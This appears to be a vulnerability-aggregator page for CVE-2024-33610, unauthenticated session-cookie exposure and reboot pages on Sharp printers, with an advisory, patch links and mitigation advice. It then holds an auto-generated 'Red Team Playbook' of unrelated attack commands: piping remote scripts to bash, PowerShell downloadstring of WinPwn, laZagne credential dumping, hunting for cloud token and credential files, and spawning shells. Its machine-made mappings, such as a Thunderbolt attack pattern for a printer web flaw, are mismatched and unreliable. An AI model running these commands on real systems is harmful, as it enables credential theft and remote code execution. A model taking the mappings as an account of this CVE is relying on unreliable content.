CVE-2024-33610
Overview
This vulnerability is an authentication bypass affecting web interface components of Sharp Corporation multifunction printers. Specifically, two HTML endpoints, "sessionlist.html" and "sys_trayentryreboot.html," are exposed without requiring user authentication. The root cause lies in improper access control configuration that allows unrestricted access to sensitive session data and device control functions within the device's embedded web server.
Vulnerability Description
"sessionlist.html" and "sys_trayentryreboot.html" are accessible with no authentication. "sessionlist.html" provides logged-in users' session information including session cookies, and "sys_trayentryreboot.html" allows to reboot the device. As for the details of affected product names, model numbers, and versions, refer to the information provided by the respective vendors listed under [References].
Impact
An unauthenticated attacker with network access can retrieve active user session information, including session cookies, enabling potential session hijacking or unauthorized access. Additionally, the attacker can remotely reboot the device, causing service disruption. No user interaction or privileges are required, as indicated by CVSS vector AV:N/AC:L/PR:N/UI:N. This may lead to operational downtime and compromise of user session confidentiality within affected environments.
Solution
Sharp Corporation has released security advisories with specific firmware updates addressing this issue. Users should apply the patches referenced in the advisories at https://global.sharp/products/copier/info/info_security_2024-05.html and https://jp.sharp/business/print/information/info_security_2024-05.html. The advisories include updated firmware versions that enforce proper authentication on the affected endpoints. Administrators are advised to follow the detailed patching instructions provided by the vendors to mitigate unauthorized access and prevent device reboot abuse.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in question arises from the improper access controls implemented on specific HTML pages within the affected product's web interface. Two critical files, "sessionlist.html" and "sys_trayentryreboot.html," are exposed without any authentication requirements. The first file reveals sensitive session information, including session cookies for logged-in users. This exposure can lead to session hijacking, where an attacker could impersonate a legitimate user by stealing their session cookies. The second file allows unauthorized users to reboot the device, which can disrupt services and lead to potential denial-of-service scenarios. The lack of authentication on these pages indicates a significant oversight in the security design of the web application, making it a prime target for exploitation.
Attack vectors for this vulnerability are straightforward, as it primarily involves unauthorized access to the exposed HTML files. An attacker could leverage various methods to discover these files, such as automated scanning tools that probe for common web vulnerabilities or manual exploration of the web interface. Once the attacker gains access to "sessionlist.html," they can extract session cookies and potentially gain control over user accounts. The ability to reboot the device via "sys_trayentryreboot.html" adds another layer of risk, as an attacker could disrupt operations, force users to re-authenticate, or even cause data loss if the device is not configured to handle abrupt reboots gracefully. The simplicity of the attack makes it accessible even to less sophisticated threat actors, increasing the likelihood of exploitation.
The real-world impact of this vulnerability can be severe, particularly for organizations that rely on the affected product for critical operations. Unauthorized access to session information can lead to account takeovers, where attackers can manipulate user accounts, access sensitive data, or perform actions on behalf of legitimate users. The ability to reboot the device without authentication can result in service interruptions, affecting business continuity and potentially leading to financial losses. Furthermore, if the affected product is part of a larger ecosystem, the compromise could have cascading effects, impacting other interconnected systems and services. The reputational damage from such incidents can also be significant, as customers and stakeholders may lose trust in the organization's ability to safeguard their information.
To detect and mitigate this vulnerability, organizations should implement several strategies. First, a thorough security audit of the web application should be conducted to identify and rectify any unauthorized access points. This includes enforcing strict authentication mechanisms for all sensitive pages, ensuring that only authorized users can access critical functionalities. Regular penetration testing and vulnerability assessments can help identify similar weaknesses before they can be exploited by attackers. Additionally, organizations should monitor access logs for unusual activity, such as repeated access attempts to the exposed HTML files, which could indicate an ongoing attack. Implementing a web application firewall (WAF) can also provide an additional layer of protection by filtering out malicious requests and blocking unauthorized access attempts.
In conclusion, the vulnerability stemming from the lack of authentication on critical web interface pages poses a significant risk to organizations utilizing the affected product. The potential for session hijacking and unauthorized device reboots can lead to severe operational disruptions and data breaches. By proactively addressing these vulnerabilities through robust security measures and ongoing monitoring, organizations can significantly reduce their exposure to threats and enhance their overall cybersecurity posture.
Affected Products
No CPE information available.
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-665 | Exploitation of Thunderbolt Protection Flaws |
40%
|
Low | Very High | |
| CAPEC-127 | Directory Indexing |
30%
|
High | Medium |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (8)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-33610 |
| global.sharp |
GitHub CVE
|
https://global.sharp/products/copier/info/info_security_2024-05.html |
| jp.sharp |
GitHub CVE
|
https://jp.sharp/business/print/information/info_security_2024-05.html |
| toshibatec.com |
GitHub CVE
|
https://www.toshibatec.com/information/20240531_02.html |
| toshibatec.co.jp |
GitHub CVE
|
https://www.toshibatec.co.jp/information/20240531_02.html |
| jvn.jp |
GitHub CVE
|
https://jvn.jp/en/vu/JVNVU93051062/ |
| pierrekim.github.io |
GitHub CVE
|
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html |
| seclists.org |
NVD API
|
http://seclists.org/fulldisclosure/2024/Jul/0 |